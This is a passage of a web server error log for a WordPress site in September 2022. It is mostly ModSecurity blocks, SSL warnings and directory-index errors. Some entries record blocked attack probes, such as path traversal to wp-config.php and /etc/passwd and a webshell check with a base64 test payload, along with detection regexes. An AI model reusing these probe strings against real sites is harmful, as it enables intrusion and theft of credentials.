"/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "YyXoIbvagb1bTfOBgHRRxwAAANI"] [Sat Sep 17 10:35:30.935003 2022] [:error] [pid 19719:tid 140151963481856] [client 45.132.184.133:48160] [client 45.132.184.133] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "YyXpQsrAk3akD2Mha7uZLAAAAAk"] 2022/09/17 12:09:19 [crit] 19582#19582: *999061 SSL_do_handshake() failed (SSL: error:14094459:SSL routines:ssl3_read_bytes:tlsv1 bad certificate status response:SSL alert number 113) while SSL handshaking, client: 187.86.164.84, server: 198.199.72.26:443 [Sat Sep 17 19:03:38.896594 2022] [ssl:warn] [pid 19702:tid 140152290117504] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 18 03:50:20.214543 2022] [ssl:warn] [pid 27854:tid 139741208180608] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 18 03:50:20.339353 2022] [ssl:warn] [pid 27855:tid 139741208180608] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 18 03:50:20.812209 2022] [ssl:warn] [pid 27855:tid 139741208180608] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 18 03:50:23.109119 2022] [ssl:warn] [pid 27855:tid 139741208180608] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 18 03:50:25.428690 2022] [ssl:warn] [pid 28312:tid 140067231881088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 18 03:50:25.532543 2022] [ssl:warn] [pid 28313:tid 140067231881088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 18 04:22:16.982070 2022] [:error] [pid 28337:tid 140066777122560] [client 94.232.43.93:41418] [client 94.232.43.93] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".inc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.inc"] [unique_id "YybjSIMKjy_391VYltl_QQAAAJg"] [Sun Sep 18 12:28:49.428589 2022] [:error] [pid 28335:tid 140066827478784] [client 5.188.62.21:53418] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "YydVUZ2_XeixYFoIB9SR1gAAABI"] [Mon Sep 19 03:40:32.416101 2022] [:error] [pid 28336:tid 140066793907968] [client 5.188.62.21:44852] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "YygrAGvVoxJ1livDfcsPewAAAFY"] [Mon Sep 19 03:41:41.067915 2022] [:error] [pid 29022:tid 140066869442304] [client 5.188.62.174:44866] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "YygrRfbf7eHKKRj4jtlWCgAAAM0"] [Mon Sep 19 03:44:12.715990 2022] [ssl:warn] [pid 19936:tid 139669804386176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 19 03:44:12.840142 2022] [ssl:warn] [pid 19937:tid 139669804386176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 19 03:44:13.346222 2022] [ssl:warn] [pid 19937:tid 139669804386176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 19 03:44:15.752021 2022] [ssl:warn] [pid 19937:tid 139669804386176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 19 03:44:17.980183 2022] [ssl:warn] [pid 20358:tid 139947759146880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 19 03:44:18.097054 2022] [ssl:warn] [pid 20359:tid 139947759146880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2022/09/19 06:03:33 [error] 20239#20239: *1031661 openat() "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/a/a/a/a/a.php.suspected" failed (2: No such file or directory), client: 195.201.195.185, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/a/a/a/a/a.php.suspected?wall=dmFyX2R1bXAoNDM2MzQ1NzU0KTs= HTTP/1.1", host: "investigacionperu.com" [Mon Sep 19 06:03:49.222014 2022] [autoindex:error] [pid 20376:tid 139947424057088] [client 195.201.195.185:47860] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/css/index.php?673435=1 [Mon Sep 19 07:28:28.247585 2022] [:error] [pid 20378:tid 139947365308160] [client 167.86.115.134:49444] [client 167.86.115.134] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php"] [unique_id "YyhgbP7XfoACcDvWFD3hkwAAAJE"] [Mon Sep 19 16:20:27.202014 2022] [autoindex:error] [pid 20378:tid 139947466020608] [client 193.148.251.57:52072] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Sep 19 17:03:27.733369 2022] [autoindex:error] [pid 20376:tid 139947382093568] [client 51.136.104.225:58204] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Sep 20 01:08:21.556292 2022] [:error] [pid 20378:tid 139947348522752] [client 5.188.62.174:50392] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "YylY1f7XfoACcDvWFD0kagAAAJM"] [Tue Sep 20 01:52:23.914201 2022] [:error] [pid 21840:tid 139947578545920] [client 37.19.197.200:56088] [client 37.19.197.200] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "YyljJ52MBrMh1ZzaeRJjIAAAAMA"] [Tue Sep 20 01:52:23.986950 2022] [:error] [pid 20378:tid 139947323344640] [client 37.19.197.200:56090] [client 37.19.197.200] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "YyljJ_7XfoACcDvWFD0m-gAAAJY"] [Tue Sep 20 01:52:24.031852 2022] [:error] [pid 20377:tid 139947474413312] [client 37.19.197.200:56092] [client 37.19.197.200] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/robots.txt"] [unique_id "YyljKL9x8hJP4O3O09ptvQAAAEQ"] [Tue Sep 20 01:52:25.095435 2022] [:error] [pid 20378:tid 139947449235200] [client 37.19.197.200:56096] [client 37.19.197.200] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/contacto/"] [unique_id "YyljKf7XfoACcDvWFD0m_AAAAIc"] [Tue Sep 20 01:52:25.136265 2022] [:error] [pid 20377:tid 139947449235200] [client 37.19.197.200:56098] [client 37.19.197.200] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "YyljKb9x8hJP4O3O09ptvgAAAEc"] [Tue Sep 20 01:52:26.185978 2022] [:error] [pid 21840:tid 139947314951936] [client 37.19.197.200:56100] [client 37.19.197.200] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "YyljKp2MBrMh1ZzaeRJjIQAAANc"] [Tue Sep 20 01:52:26.209543 2022] [:error] [pid 20377:tid 139947466020608] [client 37.19.197.200:56102] [client 37.19.197.200] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "YyljKr9x8hJP4O3O09ptvwAAAEU"] [Tue Sep 20 01:52:26.283692 2022] [:error] [pid 20376:tid 139947323344640] [client 37.19.197.200:56106] [client 37.19.197.200] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "YyljKhY_x7UybZQhG5kuPwAAABY"] [Tue Sep 20 01:52:27.091177 2022] [:error] [pid 20378:tid 139947457627904] [client 94.140.114.216:56112] [client 94.140.114.216] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "YyljK_7XfoACcDvWFD0m_QAAAIY"] [Tue Sep 20 01:52:27.290160 2022] [:error] [pid 21840:tid 139947348522752] [client 37.19.197.200:56114] [client 37.19.197.200] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "YyljK52MBrMh1ZzaeRJjIwAAANM"] [Tue Sep 20 01:52:27.389996 2022] [:error] [pid 20378:tid 139947306559232] [client 37.19.197.200:56116] [client 37.19.197.200] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "YyljK_7XfoACcDvWFD0m_gAAAJg"] [Tue Sep 20 02:11:54.391368 2022] [:error] [pid 20378:tid 139947415664384] [client 5.188.62.21:58548] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Yylnuv7XfoACcDvWFD0oKAAAAIs"] [Tue Sep 20 02:12:11.140454 2022] [:error] [pid 20376:tid 139947570153216] [client 46.161.60.203:58590] [client 46.161.60.203] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "YylnyxY_x7UybZQhG5kvAwAAAAE"] [Tue Sep 20 03:28:40.035169 2022] [ssl:warn] [pid 17733:tid 140145627207552] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 20 03:28:40.173178 2022] [ssl:warn] [pid 17734:tid 140145627207552] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 20 03:28:40.554722 2022] [ssl:warn] [pid 17734:tid 140145627207552] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 20 03:28:42.201455 2022] [ssl:warn] [pid 17734:tid 140145627207552] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 20 03:28:44.459472 2022] [ssl:warn] [pid 18271:tid 140544579585920] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 20 03:28:44.569673 2022] [ssl:warn] [pid 18272:tid 140544579585920] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 20 03:55:01.175982 2022] [:error] [pid 18289:tid 140544122472192] [client 103.133.214.139:43456] [client 103.133.214.139] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-download. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-download: ../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-post.php"] [unique_id "Yyl_5VAyjK3TTj31aHE-WAAAABg"] [Tue Sep 20 05:16:49.630874 2022] [:error] [pid 18606:tid 140544256755456] [client 5.188.62.21:53702] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "YymTEcX-ugRqQFe3YSudAwAAAMg"] [Tue Sep 20 05:18:23.661526 2022] [:error] [pid 18606:tid 140544198006528] [client 39.44.177.219:53900] [client 39.44.177.219] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id 